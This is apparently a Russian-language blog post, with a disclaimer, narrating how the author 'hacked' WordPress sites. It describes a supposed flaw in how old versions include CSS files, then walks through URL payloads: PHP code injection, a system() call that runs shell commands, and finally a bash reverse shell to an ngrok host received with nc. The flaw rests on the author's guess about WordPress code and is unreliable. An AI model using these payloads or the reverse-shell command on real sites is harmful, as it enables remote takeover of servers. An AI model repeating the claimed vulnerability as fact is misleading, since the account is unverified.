The story of how I completely hacked wordpress sites..

ВНИМАНИЕ! ВСЁ ЧТО ПОКАЗАНО В ЭТОЙ СТАТЬЕ НЕ ДОЛЖНО БЫТЬ ИСПОЛЬЗОВАНО В НЕЗАКОННОЙ ДЕЯТЕЛЬНОСТИ. СТАТЬЯ НАПИСАНА ЛИШЬ ДЛЯ ЗАЩИТЫ ВАШИХ СЕРВИСОВ И ПОКАЗАТЕЛЬНОМУ РАЗМЫШЛЕНИЮ!

Автор не призывает совершать какие либо противоправные действия. 272 УК РФ - наказывается сроком до 7ми лет лишения свободы.
Сайт моего друга, про который я говорю уже исправил уязвимость по моей просьбе. Оставлю его в анонимности
​

Уявимость wordpress

В старых(Важно, что в старых., ибо есть недалёкие люди, который репортят мои идеи на h1) по странному устроены импорты CSS файлов. Как я понял, там есть что-то подобное

⁡

⁡include("wp-includes/css/" . $pwd);

⁡
Но нам это только на руку...​

Тестируем

Очень интересная строчка, даже хочется кое что попробовать

Попробую что-то вроде
⁡

⁡ example.com/wp-includes/css/'.print(2+2).'.css

⁡


УСПЕХ!

И так, php код мы умеем встраивать, но что же дальше?
А дальше - больше..​

Ломаем под корень

После изучения возможностей PHP я пришел к выводу, что там можно выполнять команды в bash

Мы всё ближе к цели - доступ в консоли. Но что делать с полученной информацией? TCP Shell - вот на что я намекаю. Но вот не задача, любой символ на подобие пробела и ковычки сломает нам весь payload.

Составленный нами payload выглядит так
⁡

⁡example.com/wp-includes/css/'.$_GET[a]($_GET[b].$_GET[c]).'.css?a=system&b=whoami

⁡
Как понятно из кода, мы можем в параметрах a, b, c мы можем передавать код, который будет скрепляться в один

Теперь дело для тяжялой артилерии
Запускаем nc

запускаем ngrok с помощью которого мы опубликуем наш айпи в интернете

и подготавливаем payload
⁡

⁡ example.com/wp-includes/css/'.$_GET[a]($_GET[b].$_GET[c]).'.css?a=system&b=sudo bash -i >& /dev/tcp/0.tcp.ngrok.io/14502 0>&1

⁡
с помощью декодера переделываем всё в url encode и
​

Cпасибо огромное за прочтения, это моя первая длинная статья, которую написал сам. Выражаю благодарность тэгу CODE который шакалил статью, поэтому сегодня без него..

​